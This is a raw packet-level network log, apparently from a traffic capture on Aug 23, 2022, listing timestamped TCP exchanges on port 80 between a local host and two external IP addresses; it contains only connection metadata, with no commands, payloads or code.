                                                                                                                                                                      Aug 23, 2022 18:26:23.737345934 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.737356901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.737371922 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.737380981 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.737396955 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.737416983 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.743535042 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.743596077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:24.044404984 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.047216892 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:24.123894930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.157679081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.247842073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.247973919 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.247997999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248014927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248038054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248123884 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248137951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.248151064 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.248159885 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.248162031 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248207092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248239040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.248244047 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.248245955 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248315096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.248318911 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.248358965 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.281861067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.281908035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.281930923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.281955957 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.281960964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.281979084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282002926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282025099 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282025099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282052994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282078981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282088995 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282098055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282124996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282149076 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282161951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282166958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282171011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282187939 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282193899 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282222033 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282242060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282254934 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282263041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282283068 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282319069 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282428980 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282450914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282474995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.282505989 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.282566071 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.316154957 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316188097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316203117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316220999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316237926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316256046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316262960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.316279888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.316344976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316369057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.316402912 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.316410065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.316509962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317126036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317137003 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317153931 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317203045 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317209005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317353010 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317385912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317506075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317507982 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317509890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317610979 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317624092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317650080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317667961 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317686081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317698002 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317703962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317722082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317754030 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317760944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317837000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317857027 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.317898035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.317905903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318125963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318150997 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318192005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318200111 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318351984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318461895 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318481922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318519115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318526030 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318712950 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318751097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318770885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318789005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318815947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318823099 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318861961 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.318922043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318928003 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.318948030 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319022894 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319108963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319154024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319169998 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319192886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319206953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319231987 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319255114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319271088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319273949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319274902 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319298983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.319309950 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319314957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.319365978 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350193024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350233078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350256920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350270987 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350280046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350301027 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350303888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350311041 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350325108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350359917 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350394964 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350419998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350445032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350487947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350498915 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350502968 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350507975 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350527048 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350543022 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350544930 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350548029 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350564957 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350575924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350579023 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350583076 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350601912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350613117 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350616932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350617886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350649118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350653887 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.350956917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.350991964 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351032019 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351041079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351052046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351068974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351102114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351109028 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351115942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351201057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351222038 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351239920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351246119 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351253033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351257086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351275921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351382971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351439953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.351931095 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351957083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.351989985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352019072 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352030039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352041960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352060080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352082014 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352101088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352104902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352135897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352155924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352168083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352199078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352216005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352229118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352253914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352266073 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352269888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352288008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352322102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352329016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352365971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352384090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352416039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352421999 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352507114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352525949 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352541924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.352561951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.352569103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.353219986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.353472948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.353516102 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.353533030 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.353549004 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.353554010 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.353562117 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.353586912 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.353590965 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354212046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354247093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354265928 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354319096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354324102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354341984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354377031 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354403019 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354415894 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354477882 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354501009 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354512930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354516983 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354522943 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354554892 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354559898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354638100 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354695082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354715109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.354726076 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.354732990 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.355417967 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379422903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379450083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379466057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379482985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379496098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379525900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379544020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379601955 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379605055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379620075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379643917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379662991 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379677057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379698038 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379702091 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379785061 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379844904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379884005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379884958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379904032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379931927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.379935026 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.379942894 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.380029917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.380049944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.380090952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.380098104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.381388903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.381417036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.381607056 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.386631012 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.386962891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.387399912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387427092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387448072 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387469053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387486935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387525082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387540102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.387547016 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387547016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.387567997 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387587070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387604952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387619972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.387624025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.387624979 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387645960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387664080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387681961 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:24.387682915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:24.387686014 CEST4980080192.168.2.645.95.11.158
